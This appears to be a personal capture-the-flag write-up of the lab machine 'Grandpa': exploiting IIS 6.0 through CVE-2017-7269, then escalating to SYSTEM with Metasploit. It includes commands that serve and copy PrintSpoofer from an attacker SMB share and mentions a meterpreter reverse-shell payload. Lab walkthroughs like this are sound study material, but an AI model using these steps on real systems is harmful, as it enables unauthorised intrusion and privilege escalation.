Grandpa

Personal Rating: Medium

I rated this box medium, because I did it with Metasploit and it would have taken more effort and different steps to do it without, which was not easy for me at the time.

Initial Access

nmap:

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
OS: Windows older than Server 2008 or Windows 7

Searching for the IIS version I find CVE-2017-7269 everywhere. There is a PoC:

iis6-exploit-2017-CVE-2017-7269/iis6 reverse shell at master · g0rx/iis6-exploit-2017-CVE-2017-7269GitHub

This worked and I have a shell as network service.

Privilege Escalation

C:\>whoami /priv

whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled

With the SeImpersonate privilege we should be able to privesc using Printspoofer.

With smbserver.py I transferred the printspoofer exploit on the host. For this to work I needed to find the writeable directory C:\wmpub\wmiislog.

sudo smbserver.py -smb2support soos .

copy \\10.10.16.2\soos\PrintSpoofer32.exe .\PrintSpoofer32.exe

This did not work and made the shell inaccessible.

I transferred a windows/meterpreter/reverse_tcp payload to the host and ran it:

cmd shell.exe

I then used this exploit to get system: windows/local/ms14_058_track_popup_menu

I know that this is the easy way and you should be able to do this without metasploit.